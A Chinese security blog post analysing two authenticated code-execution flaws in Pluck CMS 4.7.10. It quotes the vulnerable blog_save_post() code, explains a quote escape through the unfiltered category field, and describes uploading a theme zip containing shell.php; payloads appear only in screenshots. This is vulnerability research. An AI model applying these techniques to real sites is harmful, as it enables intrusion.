

<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="noodp" />
    <title>Pluck CMS后台另两处任意代码执行 - </title><meta name="Description" content="yzddMr6&#39;s Blog"><meta property="og:title" content="Pluck CMS后台另两处任意代码执行" />
<meta property="og:description" content="1 前言本来是在cnvd上看到了有人发Pluck CMS的洞，但是没有公开细节，便想着自己挖一下。 但是审完第一个后发现已经有两位同学写出来了 Pluck CMS" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://yzddmr6.com/posts/pluck-cms-getshell/" /><meta property="og:image" content="https://yzddmr6.com/images/avatar.webp" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2019-10-26T14:46:27+00:00" />
<meta property="article:modified_time" content="2019-10-26T14:46:27+00:00" /><meta property="og:site_name" content="Hugo DoIt Theme Documentation" />

<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="https://yzddmr6.com/images/avatar.webp" /><meta name="twitter:title" content="Pluck CMS后台另两处任意代码执行"/>
<meta name="twitter:description" content="1 前言本来是在cnvd上看到了有人发Pluck CMS的洞，但是没有公开细节，便想着自己挖一下。 但是审完第一个后发现已经有两位同学写出来了 Pluck CMS"/>
<meta name="application-name" content="yzddMr6&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="yzddMr6&#39;s Blog">

<meta name="theme-color" content="#f8f8f8"><meta name="msapplication-TileColor" content="#da532c"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><link rel="canonical" href="https://yzddmr6.com/posts/pluck-cms-getshell/" /><link rel="prev" href="https://yzddmr6.com/posts/antsword-xor-encoder/" /><link rel="next" href="https://yzddmr6.com/posts/ant-mass-bypass/" />
<link rel="stylesheet" href="/css/main.css"><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/color.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="/lib/fontawesome-free/all.min.css">
        <noscript><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"></noscript><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="/lib/animate/animate.min.css">
        <noscript><link rel="stylesheet" href="/lib/animate/animate.min.css"></noscript><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "Pluck CMS后台另两处任意代码执行",
        "inLanguage": "zh-CN",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/yzddmr6.com\/posts\/pluck-cms-getshell\/"
        },"genre": "posts","keywords": "代码审计","wordcount":  1096 ,
        "url": "https:\/\/yzddmr6.com\/posts\/pluck-cms-getshell\/","datePublished": "2019-10-26T14:46:27+00:00","dateModified": "2019-10-26T14:46:27+00:00","license": "This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.","publisher": {
            "@type": "Organization",
            "name": "xxxx","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/yzddmr6.com\/images\/avatar.webp",
                    "width":  640 ,
                    "height":  640 
                }},"author": {
                "@type": "Person",
                "name": "yzddMr6"
            },"description": ""
    }
    </script><script src="//instant.page/5.2.0" defer type="module" integrity="sha384-jnZyxPjiipYXnSU0ygqeac2q7CVYMbh84q0uHVRRxEtvFPiQYbXWUorga2aqZJ0z"></script>
</head>

<body header-desktop="fixed" header-mobile="auto"><script type="text/javascript">
        function setTheme(theme) {document.body.setAttribute('theme', theme); document.documentElement.style.setProperty('color-scheme', theme === 'light' ? 'light' : 'dark'); window.theme = theme;   window.isDark = window.theme !== 'light' }
        function saveTheme(theme) {window.localStorage && localStorage.setItem('theme', theme);}
        function getMeta(metaName) {const metas = document.getElementsByTagName('meta'); for (let i = 0; i < metas.length; i++) if (metas[i].getAttribute('name') === metaName) return metas[i]; return '';}
        if (window.localStorage && localStorage.getItem('theme')) {let theme = localStorage.getItem('theme');theme === 'light' || theme === 'dark' || theme === 'black' ? setTheme(theme) : (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? setTheme('dark') : setTheme('light')); } else { if ('auto' === 'light' || 'auto' === 'dark' || 'auto' === 'black') setTheme('auto'), saveTheme('auto'); else saveTheme('auto'), window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches ? setTheme('dark') : setTheme('light');}
        let metaColors = {'light': '#f8f8f8','dark': '#252627','black': '#000000'}
        getMeta('theme-color').content = metaColors[document.body.getAttribute('theme')];
        window.switchThemeEventSet = new Set()
    </script>
    <div id="back-to-top"></div>
    <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="">yzddMr6&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/"> 所有文章 </a><a class="menu-item" href="/tags/"> 标签 </a><a class="menu-item" href="/categories/"> 分类 </a><a class="menu-item" href="/showcase/"> 会议演讲 </a><a class="menu-item" href="/friends/"> 友情链接 </a><a class="menu-item" href="/about/"> 关于 </a><a class="menu-item" href="https://github.com/yzddmr6" title="GitHub" rel="noopener noreferrer" target="_blank"><i class='fab fa-github fa-fw'></i>  </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="搜索文章标题或内容..." id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-select" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                    <select class="color-theme-select" id="theme-select-desktop" title="切换主题">
                        <option value="light">浅色</option>
                        <option value="dark">深色</option>
                        <option value="black">黑色</option>
                        <option value="auto">跟随系统</option>
                    </select>
                </a></div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="">yzddMr6&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="搜索文章标题或内容..." id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="">所有文章</a><a class="menu-item" href="/tags/" title="">标签</a><a class="menu-item" href="/categories/" title="">分类</a><a class="menu-item" href="/showcase/" title="">会议演讲</a><a class="menu-item" href="/friends/" title="">友情链接</a><a class="menu-item" href="/about/" title="">关于</a><a class="menu-item" href="https://github.com/yzddmr6" title="GitHub" rel="noopener noreferrer" target="_blank"><i class='fab fa-github fa-fw'></i></a><a href="javascript:void(0);" class="menu-item theme-select" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
                <select class="color-theme-select" id="theme-select-mobile" title="切换主题">
                    <option value="light">浅色</option>
                    <option value="dark">深色</option>
                    <option value="black">黑色</option>
                    <option value="auto">跟随系统</option>
                </select>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
            <div class="container"><div class="toc" id="toc-auto">
        <h2 class="toc-title">目录</h2>
        <div class="toc-content" id="toc-content-auto"><nav id="TableOfContents">
  <ul>
    <li><a href="#前言">前言</a></li>
    <li><a href="#正文">正文</a>
      <ul>
        <li><a href="#第一处过滤不严导致单引号逃逸">第一处：过滤不严导致单引号逃逸</a></li>
        <li><a href="#第二处安装模版文件包含导致任意命令执行">第二处：安装模版+文件包含导致任意命令执行</a>
          <ul>
            <li><a href="#直接访问失败">直接访问失败</a></li>
            <li><a href="#文件包含突破">文件包含突破</a></li>
            <li><a href="#利用方法">利用方法</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#最后">最后</a></li>
  </ul>
</nav></div>
    </div><script>document.getElementsByTagName("main")[0].setAttribute("autoTOC", "true")</script><article class="page single"><h1 class="single-title animate__animated animate__flipInX">Pluck CMS后台另两处任意代码执行</h1><div class="post-meta">
            <div class="post-meta-line">
                <span class="post-author"><span class="author fas fa-user-circle fa-fw"></span><a href="https://github.com/yzddmr6" title="Author" target="_blank" rel="noopener noreferrer author" class="author">yzddMr6</a>
                </span>&nbsp;<span class="post-category">收录于 </span>&nbsp;<span class="post-category">类别 <a href="/categories/%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0/"><i class="far fa-folder fa-fw"></i>技术文章</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2019-10-26">2019-10-26</time>&nbsp;<i class="far fa-edit fa-fw"></i>&nbsp;<time datetime="2019-10-26">2019-10-26</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 1096 字&nbsp;<i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 3 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#前言">前言</a></li>
    <li><a href="#正文">正文</a>
      <ul>
        <li><a href="#第一处过滤不严导致单引号逃逸">第一处：过滤不严导致单引号逃逸</a></li>
        <li><a href="#第二处安装模版文件包含导致任意命令执行">第二处：安装模版+文件包含导致任意命令执行</a>
          <ul>
            <li><a href="#直接访问失败">直接访问失败</a></li>
            <li><a href="#文件包含突破">文件包含突破</a></li>
            <li><a href="#利用方法">利用方法</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#最后">最后</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><meta name="referrer" content="no-referrer" />
<h2 id="前言" class="headerLink">
    <a href="#%e5%89%8d%e8%a8%80" class="header-mark"></a>1 前言</h2><p>本来是在cnvd上看到了有人发Pluck CMS的洞，但是没有公开细节，便想着自己挖一下。</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414013-1ccfc948-88c7-4562-96d6-f1b73cdb23e4.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p>但是审完第一个后发现已经有两位同学写出来了</p>
<p><a href="https://xz.aliyun.com/t/6486" target="_blank" rel="noopener noreferrer">Pluck CMS 4.7.10远程代码执行漏洞分析</a></p>
<p><a href="https://xz.aliyun.com/t/6543" target="_blank" rel="noopener noreferrer">Pluck CMS 4.7.10 后台 文件包含+文件上传导致getshell代码分析</a></p>
<p>当时自己的思路跟第一个同学一样，第二个同学的思路自己确实没有想到，佩服佩服。</p>
<p>但是心有不甘，自己就继续挖掘了一下，又发现了两处可以任意命令执行的地方。</p>
<h2 id="正文" class="headerLink">
    <a href="#%e6%ad%a3%e6%96%87" class="header-mark"></a>2 正文</h2><h3 id="第一处过滤不严导致单引号逃逸" class="headerLink">
    <a href="#%e7%ac%ac%e4%b8%80%e5%a4%84%e8%bf%87%e6%bb%a4%e4%b8%8d%e4%b8%a5%e5%af%bc%e8%87%b4%e5%8d%95%e5%bc%95%e5%8f%b7%e9%80%83%e9%80%b8" class="header-mark"></a>2.1 第一处：过滤不严导致单引号逃逸</h3><p>这个跟第一篇思路一样，只不过找到了另一处未过滤的点</p>
<p>在<code>function.php</code>里面<code>blog_save_post()</code>函数</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">function</span> <span class="n">blog_save_post</span><span class="p">(</span><span class="o">$</span><span class="n">title</span><span class="p">,</span> <span class="o">$</span><span class="n">category</span><span class="p">,</span> <span class="o">$</span><span class="n">content</span><span class="p">,</span> <span class="o">$</span><span class="n">current_seoname</span> <span class="o">=</span> <span class="n">null</span><span class="p">,</span> <span class="o">$</span><span class="n">force_time</span> <span class="o">=</span> <span class="n">null</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span><span class="n">Check</span> <span class="k">if</span> <span class="s1">&#39;posts&#39;</span> <span class="n">directory</span> <span class="n">exists</span><span class="p">,</span> <span class="k">if</span> <span class="ow">not</span><span class="p">;</span> <span class="n">create</span> <span class="n">it</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">is_dir</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">mkdir</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">chmod</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="p">,</span> <span class="mi">0777</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span><span class="n">Create</span> <span class="n">seo</span><span class="o">-</span><span class="n">filename</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">seoname</span> <span class="o">=</span> <span class="n">seo_url</span><span class="p">(</span><span class="o">$</span><span class="n">title</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span><span class="n">Sanitize</span> <span class="n">variables</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">title</span> <span class="o">=</span> <span class="n">sanitize</span><span class="p">(</span><span class="o">$</span><span class="n">title</span><span class="p">,</span> <span class="bp">true</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">content</span> <span class="o">=</span> <span class="n">sanitizePageContent</span><span class="p">(</span><span class="o">$</span><span class="n">content</span><span class="p">,</span> <span class="bp">false</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">empty</span><span class="p">(</span><span class="o">$</span><span class="n">current_seoname</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">current_filename</span> <span class="o">=</span> <span class="n">blog_get_post_filename</span><span class="p">(</span><span class="o">$</span><span class="n">current_seoname</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">parts</span> <span class="o">=</span> <span class="n">explode</span><span class="p">(</span><span class="s1">&#39;.&#39;</span><span class="p">,</span> <span class="o">$</span><span class="n">current_filename</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">number</span> <span class="o">=</span> <span class="o">$</span><span class="n">parts</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">		<span class="o">//</span><span class="n">Get</span> <span class="n">the</span> <span class="n">post</span> <span class="n">time</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">		<span class="n">include</span> <span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">current_filename</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">seoname</span> <span class="o">!=</span> <span class="o">$</span><span class="n">current_seoname</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">unlink</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">current_filename</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="k">if</span> <span class="p">(</span><span class="n">is_dir</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">current_seoname</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">				<span class="n">rename</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">current_seoname</span><span class="p">,</span> <span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">seoname</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">files</span> <span class="o">=</span> <span class="n">read_dir_contents</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="p">,</span> <span class="s1">&#39;files&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">//</span><span class="n">Find</span> <span class="n">the</span> <span class="n">number</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">files</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="o">$</span><span class="n">number</span> <span class="o">=</span> <span class="n">count</span><span class="p">(</span><span class="o">$</span><span class="n">files</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="o">$</span><span class="n">number</span><span class="o">++</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">		<span class="k">else</span>
</span></span><span class="line"><span class="cl">			<span class="o">$</span><span class="n">number</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">empty</span><span class="p">(</span><span class="o">$</span><span class="n">force_time</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="o">$</span><span class="n">post_time</span> <span class="o">=</span> <span class="n">time</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">		<span class="k">else</span>
</span></span><span class="line"><span class="cl">			<span class="o">$</span><span class="n">post_time</span> <span class="o">=</span> <span class="o">$</span><span class="n">force_time</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span><span class="n">Save</span> <span class="n">information</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">data</span><span class="p">[</span><span class="s1">&#39;post_title&#39;</span><span class="p">]</span>    <span class="o">=</span> <span class="o">$</span><span class="n">title</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">data</span><span class="p">[</span><span class="s1">&#39;post_category&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="o">$</span><span class="n">category</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">data</span><span class="p">[</span><span class="s1">&#39;post_content&#39;</span><span class="p">]</span>  <span class="o">=</span> <span class="o">$</span><span class="n">content</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">data</span><span class="p">[</span><span class="s1">&#39;post_time&#39;</span><span class="p">]</span>     <span class="o">=</span> <span class="o">$</span><span class="n">post_time</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">save_file</span><span class="p">(</span><span class="n">BLOG_POSTS_DIR</span><span class="o">.</span><span class="s1">&#39;/&#39;</span><span class="o">.$</span><span class="n">number</span><span class="o">.</span><span class="s1">&#39;.&#39;</span><span class="o">.$</span><span class="n">seoname</span><span class="o">.</span><span class="s1">&#39;.php&#39;</span><span class="p">,</span> <span class="o">$</span><span class="n">data</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span><span class="n">Return</span> <span class="n">seoname</span> <span class="n">under</span> <span class="n">which</span> <span class="n">post</span> <span class="n">has</span> <span class="n">been</span> <span class="n">saved</span> <span class="p">(</span><span class="n">to</span> <span class="n">allow</span> <span class="k">for</span> <span class="n">redirect</span><span class="p">)</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="o">$</span><span class="n">seoname</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>其中</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$data[&#39;post_title&#39;]    = $title;
</span></span><span class="line"><span class="cl">	$data[&#39;post_category&#39;] = $category;
</span></span><span class="line"><span class="cl">	$data[&#39;post_content&#39;]  = $content;
</span></span><span class="line"><span class="cl">	$data[&#39;post_time&#39;]     = $post_time;
</span></span></code></pre></td></tr></table>
</div>
</div><p>$title  content åè¢«è¿æ»¤ï¼post_time不可控，$category可控</p>
<p>所以只要把$cont2变成我们的payload即可</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414122-82d3a774-b95d-48d3-be5d-706ed8fd141d.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414238-be9dab3c-57bd-49b6-a4f0-486c36e7d6ef.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414333-e34949fc-0b34-4477-b8a0-c6ba56824748.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<h3 id="第二处安装模版文件包含导致任意命令执行" class="headerLink">
    <a href="#%e7%ac%ac%e4%ba%8c%e5%a4%84%e5%ae%89%e8%a3%85%e6%a8%a1%e7%89%88%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e5%af%bc%e8%87%b4%e4%bb%bb%e6%84%8f%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c" class="header-mark"></a>2.2 第二处：安装模版+文件包含导致任意命令执行</h3><p>很多CMS都会在安装模版的时候getshell，那么这里笔者也发现了类似的漏洞。</p>
<h4 id="直接访问失败" class="headerLink">
    <a href="#%e7%9b%b4%e6%8e%a5%e8%ae%bf%e9%97%ae%e5%a4%b1%e8%b4%a5" class="header-mark"></a>2.2.1 直接访问失败</h4><p>首先准备一个<code>shell.php</code>里面是我们的<code>phpinfo();</code></p>
<p>然后打包成<code>shell.zip</code>，直接上传主题</p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414431-f2b003ff-fe03-4675-8e8f-33d89779d2db.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
<p><figure><a class="lightgallery" href="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png" title="img" data-thumbnail="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png">
        <img
            
            loading="lazy"
            src="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png"
            srcset="https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png 1.5x, https://cdn.nlark.com/yuque/0/2021/png/1599908/1623900414523-9fc966fe-81c9-4807-a3b0-951d6453df12.png 2x"
            sizes="100px"
            alt="img">
    </a></figure></p>
